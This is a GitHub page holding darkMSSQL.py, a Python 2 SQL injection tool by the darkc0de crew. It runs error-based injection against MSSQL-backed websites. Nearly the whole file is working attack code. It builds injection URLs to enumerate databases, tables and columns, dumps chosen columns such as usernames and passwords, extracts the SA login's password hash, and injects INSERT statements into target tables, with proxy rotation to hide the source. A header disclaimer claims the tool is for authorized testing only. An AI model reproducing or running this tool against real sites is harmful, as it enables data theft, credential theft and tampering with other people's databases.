forked from tuwid/darkc0de-old-stuff
-
Notifications
You must be signed in to change notification settings - Fork 7
/
darkMSSQL.py
446 lines (419 loc) · 20 KB
/
darkMSSQL.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Share the c0de!
# darkc0de Crew
# www.darkc0de.com
# rsauron[at]gmail[dot]com
# Greetz to
# d3hydr8, Tarsian, rechemen, c0mrade (r.i.p brotha), reverenddigitalx
# and the darkc0de crew
# Thanks to inkubus for helping me beta
# NOTES:
# Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..
# The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy
# will not be used. This is a effort to keep the script from getting stuck in a endless loop.
# Any other questions Hit the forums and ask questions. google is your friend!
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage caused! User assumes all responsibility
# Intended for authorized Web Application Pen Testing Only!
# BE WARNED, THIS TOOL IS VERY LOUD..
import sys, re, os, socket, urllib2, time, random, cookielib, string
#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
#say hello
os.system(SysCls)
if len(sys.argv) <= 1:
print "\n|------------------------------------------------|"
print "| rsauron[@]gmail[dot]com v2.0 |"
print "| 10/2008 darkMSSQL.py |"
print "| -MSSQL Error Based Database Enumeration |"
print "| -MSSQL Server Information Enumeration |"
print "| -MSSQL Data Extractor |"
print "| Usage: darkMSSQL.py [options] |"
print "| [Public Beta] -h help darkc0de.com |"
print "|------------------------------------------------|\n"
sys.exit(1)
#help option
for arg in sys.argv:
if arg == "-h":
print " Usage: ./darkMSSQL.py [options] rsauron[@]gmail[dot]com darkc0de.com"
print "\tModes:"
print "\tDefine: --info Gets MySQL server configuration only."
print "\tDefine: --dbs Shows all databases user has access too."
print "\tDefine: --schema Enumerate Information_schema Database."
print "\tDefine: --dump Extract information from a Database, Table and Column."
print "\tDefine: --insert Insert data into specified db, table and column(s)."
print "\n\tRequired:"
print "\tDefine: -u URL \"www.site.com/news.asp?id=2\" or \"www.site.com/index.asp?id=news'\""
print "\n\tMode dump and schema options:"
print "\tDefine: -D \"database_name\""
print "\tDefine: -T \"table_name\""
print "\tDefine: -C \"column_name,column_name...\""
print "\n\tOptional:"
print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
print "\tDefine: -o \"ouput_file_name.txt\" Default is darkMSSQLlog.txt"
print "\tDefine: -r \"-r 20\" this will make the script resume at row 20 during dumping"
print "\tDefine: --cookie \"cookie_file.txt\""
print "\tDefine: --debug Prints debug info to terminal."
print "\n Ex: ./darkMSSQL.py --info -u \"www.site.com/news.asp?id=2\""
print " Ex: ./darkMSSQL.py --dbs -u \"www.site.com/news.asp?id=2\""
print " Ex: ./darkMSSQL.py --schema -u \"www.site.com/news.asp?id=2\" -D dbname"
print " Ex: ./darkMSSQL.py --dump -u \"www.site.com/news.asp?id=2\" -D dbname -T tablename -C username,password"
print " Ex: ./darkMSSQL.py -u \"www.site.com/news.asp?news=article'\" -D dbname -T table -C user,pass --insert -D dbname -T table -C darkuser,darkpass"
print
sys.exit(1)
#define varablies
site = ""
dbt = "darkMSSQLlog.txt"
proxy = "None"
count = 0
basicinfo = ["@@VERSION","USER","DB_NAME()","HOST_NAME()",]#@@SERVERNAME] *SEVERNAME causes errors on some 2000 servers
db_num = 0
top_num = 0
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_insert = "None"
arg_debug = "off"
arg_cookie = "None"
col_url = ""
insert_url = ""
selected_col = ""
inserted_data = ""
mode = "None"
gets = 0
row_num = 0
#Check args
for arg in sys.argv:
if arg == "-u":
site = sys.argv[count+1]
elif arg == "-o":
dbt = sys.argv[count+1]
elif arg == "-p":
proxy = sys.argv[count+1]
elif arg == "--info":
mode = arg
arg_info = sys.argv[count]
elif arg == "--dbs":
mode = arg
arg_dbs = sys.argv[count]
elif arg == "--schema":
mode = arg
arg_schema = sys.argv[count]
elif arg == "--dump":
mode = arg
arg_dump = sys.argv[count]
elif arg == "-D":
arg_database = sys.argv[count+1]
elif arg == "-T":
arg_table = sys.argv[count+1]
elif arg == "-C":
arg_columns = sys.argv[count+1]
elif arg == "--debug":
arg_debug = "on"
elif arg == "--cookie":
arg_cookie = sys.argv[count+1]
elif arg == "--insert":
mode = arg
arg_insert = sys.argv[count+1]
elif arg == "-r":
row_num = sys.argv[count+1]
top_num = sys.argv[count+1]
count+=1
#Title write
file = open(dbt, "a")
print "\n|------------------------------------------------|"
print "| rsauron[@]gmail[dot]com v2.0 |"
print "| 10/2008 darkMSSQL.py |"
print "| -MSSQL Error Based Database Enumeration |"
print "| -MSSQL Server Information Enumeration |"
print "| -MSSQL Data Extractor |"
print "| Usage: darkMSSQL.py [options] |"
print "| [Public Beta] -h help darkc0de.com |"
print "|------------------------------------------------|"
file.write("\n|------------------------------------------------|")
file.write("\n| rsauron[@]gmail[dot]com v2.0 |")
file.write("\n| 10/2008 darkMSSQL.py |")
file.write("\n| -MSSQL Error Based Database Enumeration |")
file.write("\n| -MSSQL Server Information Enumeration |")
file.write("\n| -MSSQL Data Extractor |")
file.write("\n| Usage: darkMSSQL.py [options] |")
file.write("\n| [Public Beta] -h help darkc0de.com |")
file.write("\n|------------------------------------------------|")
#Arg Error Checking
if site == "":
print "\n[-] Must include -u flag and specify a mode."
print "[-] For help -h\n"
sys.exit(1)
if mode == "None":
print "\n[-] Mode must be specified --info, --dbs, --schema, --dump, --insert"
print "[-] For help -h\n"
sys.exit(1)
if mode == "--schema" and arg_database == "None":
print "\n[-] Must include -D flag!"
print "[-] For Help -h\n"
sys.exit(1)
if mode == "--dump":
if arg_table == "None" or arg_columns == "None":
print "\n[-] You must include -D, -T and -C flag when --dump specified!"
print "[-] For help -h\n"
sys.exit(1)
if proxy != "None":
if len(proxy.split(".")) == 2:
proxy = open(proxy, "r").read()
if proxy.endswith("\n"):
proxy = proxy.rstrip("\n")
proxy = proxy.split("\n")
if site[:4] != "http":
site = "http://"+site
if site.endswith("/*"):
site = site.rstrip('/*')
if site.endswith("--"):
site = site.rstrip('--')
if arg_cookie != "None":
try:
cj = cookielib.MozillaCookieJar()
cj.load(arg_cookie)
cookie_handler = urllib2.HTTPCookieProcessor(cj)
except:
print "[!] There was a problem loading your cookie file!"
print "[!] Make sure the cookie file is in Mozilla Cookie File Format!"
print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n"
sys.exit(1)
else:
cookie_handler = urllib2.HTTPCookieProcessor()
if arg_columns != "None":
arg_columns = arg_columns.split(",")
for column in arg_columns:
col_url += "%2bconvert(varchar,isnull(convert(varchar,"+column+"),char(32)))%2bchar(58)"
if arg_insert != "None":
arg_insert = arg_insert.split(",")
#General Info
print "\n[+] URL:",site
file.write("\n\n[+] URL:"+site)
print "[+] %s" % time.strftime("%X")
file.write("\n[+] %s" % time.strftime("%X"))
print "[+] Cookie:", arg_cookie
file.write("\n[+] Cookie: "+arg_cookie)
#Build proxy list
socket.setdefaulttimeout(10)
proxy_list = []
if proxy != "None":
file.write("\n[+] Building Proxy List...")
print "[+] Building Proxy List..."
for p in proxy:
try:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
opener = urllib2.build_opener(proxy_handler)
opener.open("http://www.google.com")
proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler))
file.write("\n\tProxy:"+p+"- Success")
print "\tProxy:",p,"- Success"
except:
file.write("\n\tProxy:"+p+"- Failed")
print "\tProxy:",p,"- Failed"
pass
if len(proxy_list) == 0:
print "[-] All proxies have failed. App Exiting"
sys.exit(1)
print "[+] Proxy List Complete"
file.write("\n[+] Proxy List Complete")
else:
print "[-] Proxy Not Given"
file.write("\n[+] Proxy Not Given")
proxy_list.append(urllib2.build_opener(cookie_handler))
proxy_num = 0
proxy_len = len(proxy_list)
#URL Get Function
def GetTheShit(head_URL):
try:
if arg_debug == "on":
print "\n[debug]",head_URL
file.write("\n[debug] "+head_URL)
try:
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
except urllib2.HTTPError, e:
source = e.read()
match = re.findall("value '[\d\D]*' to",source)
match = match[0][7:-4]
return match
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
# Here are the modes!
if mode == "--info":
print "[+] Displaying information about MSSQL host!\n"
file.write("\n[+] Displaying information about MSSQL host!\n")
site_URL = site+"+or+1=convert(int,(darkc0de))--"
for baseinfo in basicinfo:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(baseinfo))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
print "[-] We seem to be having a problem! Check it out manually!"
print "[-] "+str(head_URL)
print "\n[-] Done"
sys.exit(1)
if baseinfo == "@@VERSION":
ver_info = the_juice
print "[+]",baseinfo+":",the_juice
file.write("\n[+] "+baseinfo+": "+the_juice)
print "\n[+] Script detected Microsoft SQL Version:",ver_info[21:26]
file.write("\n\n[+] Script detected Microsoft SQL Version: "+ver_info[21:26])
if ver_info[25] == "0":
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+master.dbo.fn_varbintohexstr(password)+from+master..sysxlogins+where+name='sa'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
yesno = "Nope!"
else:
yesno = "Yes! w00t w00t! Time to break out sqlninja!"
else:
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+master.sys.fn_varbintohexstr(password_hash)+from+master.sys.sql_logins+where+name='sa'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
yesno = "Nope!"
else:
yesno = "Yes! w00t w00t! Time to break out sqlninja!"
print "[+] Checking to see if we can view password hashs...", yesno
file.write("\n[+] Checking to see if we can view password hashs... "+yesno)
if yesno != "Nope!":
print "[!] Dumping SA Account info:"
file.write("\n[!] Dumping SA Account info:")
print "\tUsername: SA"
file.write("\n\tUsername: SA")
print "\tSalt:",the_juice[6:14]
file.write("\n\tSalt: "+the_juice[6:14])
print "\tMixedcase:",the_juice[15:54]
file.write("\n\tMixedcase: "+the_juice[15:54])
print "\tUppercase:",the_juice[55:]
file.write("\n\tUppercase: "+the_juice[55:])
print "\tFull Hash:",the_juice
file.write("\n\tFull Hash: "+the_juice)
if mode == "--dbs":
print "[+] Displaying list of all databases on MSSQL host!\n"
file.write("\n[+] Displaying list of all databases on MSSQL host!\n")
while 1:
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(DB_NAME(darkc0de)))--"
head_URL = head_URL.replace("darkc0de",str(db_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
db_num+=1;row_num+=1
if mode == "--schema":
#List Tables
if arg_database != "None" and arg_table == "None":
print "[+] Displaying tables inside DB: "+arg_database+"\n"
file.write("\n[+] Displaying tables inside DB: "+arg_database+"\n")
site_URL = site+"+or+1=convert(int,(select+top+1+table_name+from+"+arg_database+".information_schema.tables+where+table_name+NOT+IN"
site_URL = site_URL+"+(SELECT+TOP+darkc0de+table_name+FROM+"+arg_database+".information_schema.tables+ORDER+BY+table_name)+ORDER+BY+table_name))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if str(row_num) == "1":
print "[-] We do not seem to have premissions to view this database!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num+=1;row_num+=1
#List Columns
if arg_table != "None":
print "[+] Displaying Columns inside DB: "+arg_database+" and Table: "+arg_table+"\n"
file.write("\n[+] Displaying Columns inside DB: "+arg_database+" and Table: "+arg_table+"\n")
site_URL = site+"+or+1=convert(int,(select+top+1+column_name+from+"+arg_database+".information_schema.columns+where+table_name='"+arg_table+"'+AND+column_name+NOT+IN"
site_URL = site_URL+"+(SELECT+TOP+darkc0de+column_name+FROM+"+arg_database+".information_schema.columns+where+table_name='"+arg_table+"'+ORDER+BY+column_name)+ORDER+BY+column_name))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if str(row_num) == "1":
print "[-] We do not seem to have premissions to view this table!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num+=1;row_num+=1
if mode == "--dump":
print "[+] Dumping data from DB: "+arg_database+", Table: "+arg_table+", Column: "+str(arg_columns)+"\n"
site_URL = site+"+or+1=convert(int,(select+top+1+"+col_url+"+from+"+arg_database+".."+arg_table+"+where+"+arg_columns[0]
site_URL = site_URL+"+NOT+in+(SELECT+TOP+darkc0de+"+arg_columns[0]+"+from+"+arg_database+".."+arg_table+")))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if row_num == 1:
print "[-] We seem to be having a problem!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
break
the_juice = string.rstrip(the_juice,":")
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num = int(top_num) + 1;row_num = int(row_num) + 1
if mode == "--insert":
print "[+] Inserting data into..."
print "\tDB: "+arg_database
print "\tTable: "+arg_table
print "\tColumn(s):\tData to be inserted:\n"
try:
for x in range(0, len(arg_columns)):
print "\t["+str(x)+"] "+arg_columns[x]+"\t"+arg_insert[x]
except:
pass
for column in arg_columns:
selected_col += column+","
selected_col = selected_col.rstrip(",")
for data in arg_insert:
inserted_data += "'"+data+"',"
inserted_data = inserted_data.rstrip(",")
gets+=1;proxy_num+=1
head_URL = site+";INSERT+INTO+"+arg_table+"("+selected_col+")+VALUES("+inserted_data+")--"
print "\n[!] Inserting Data....",
the_juice = GetTheShit(head_URL)
print "Done!"
print "\n[+] Was the data inserted?"
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+"+col_url+"+from+"+arg_database+".."+arg_table+"+where+"+arg_columns[0]+"='"+arg_insert[0]+"'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
print "\n[-] Does not look like the data was inserted!"
else:
the_juice = the_juice.rstrip(":")
print "\t"+the_juice
print "[!] Data was successfully inserted!"
# Closing Info
print "\n[-] %s" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] [%s]" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()